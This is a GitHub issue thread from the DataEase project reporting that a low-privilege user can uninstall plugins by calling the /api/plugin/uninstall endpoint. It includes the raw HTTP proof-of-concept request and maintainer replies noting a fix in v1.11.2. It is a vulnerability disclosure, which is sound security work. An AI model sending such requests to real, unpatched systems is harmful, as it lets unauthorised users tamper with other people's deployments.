### ISSUE TITLE
[Bug]普通权限越权卸载插件

### ISSUE THREAD

**Issue by Ryze-T** [dataease/dataease#2429]
**DataEase 版本**
最新版

**运行方式(安装包运行 or 源码运行 ?)**
安装包运行

**浏览器版本**
任意

**Bug 描述**
普通权限越权卸载插件

**Bug 重现步骤(有截图更好)**
普通用户无法对插件进行处理，但是通过调用接口可对插件进行卸载：
```
POST /api/plugin/uninstall/1 HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: xxx
LINK-PWD-TOKEN: null
Connection: close
Content-Length: 0
```
Authorization为鉴权标准，低权限依然可以调用api/plugin/uninstall接口进行插件卸载：
<img width="963" alt="image" src="https://user-images.githubusercontent.com/76553352/173774203-0327bb05-9054-45c6-9680-4574ee824b4e.png">
包发送后显示成功：
<img width="970" alt="image" src="https://user-images.githubusercontent.com/76553352/173774267-1c20b3d9-1016-4148-9416-16ca7c454ff9.png">
管理员查看插件被卸载，漏洞利用成功：
<img width="973" alt="image" src="https://user-images.githubusercontent.com/76553352/173774377-662966a1-8747-44f1-82fa-03cf34092ce0.png">

**Comment by xuwei-fit2cloud** [comment]
感谢反馈，我们尽快修复。

**Comment by maninhill** [comment]
v1.11.2 已修复，详情请参考：https://github.com/dataease/dataease/releases/tag/v1.11.2
